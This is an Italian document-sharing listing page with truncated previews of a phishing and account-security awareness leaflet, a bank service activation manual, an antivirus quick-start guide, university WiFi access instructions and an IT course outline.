Proteggi gli account personali con la collaborazione di Proteggi gli account personali Pensi che il PHISHING sia solo un tipo di pesca? Pensi che i COOKIE siano solo biscotti? Pensi che un VIRUS sia solo un raffreddore? Proteggi gli

Dettagli

Manuale di Attivazione. Edizione Ottobre 2008

Manuale di Attivazione. Edizione Ottobre 2008 Manuale di Attivazione Edizione Ottobre 2008 Manuale attivazione PaschiInTesoreria - Ottobre 2008 INDICE 1. Requisiti preliminari 3 2. Dati per l accesso al servizio 3 3. Istruzioni per l attivazione del

Dettagli

Benvenuti alla Guida introduttiva - Sicurezza

Benvenuti alla Guida introduttiva - Sicurezza Benvenuti alla Guida introduttiva - Sicurezza Table of Contents Benvenuti alla Guida introduttiva - Sicurezza... 1 PC Tools Internet Security... 3 Guida introduttiva a PC Tools Internet Security... 3

Dettagli

Università Degli Studi dell Insubria. Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless

Università Degli Studi dell Insubria. Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless Università Degli Studi dell Insubria Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless Istruzioni per l accesso alla rete WiFi INSUBRIA-CAMPUS-STUDENTI Configurazione

Dettagli

Colloquio di informatica (5 crediti)

Colloquio di informatica (5 crediti) Università degli studi della Tuscia Dipartimento di Scienze Ecologiche e Biologiche Corso di laurea in Scienze Ambientali A.A. 2013-2014 - II semestre Colloquio di informatica (5 crediti) Prof. Pier Giorgio

Dettagli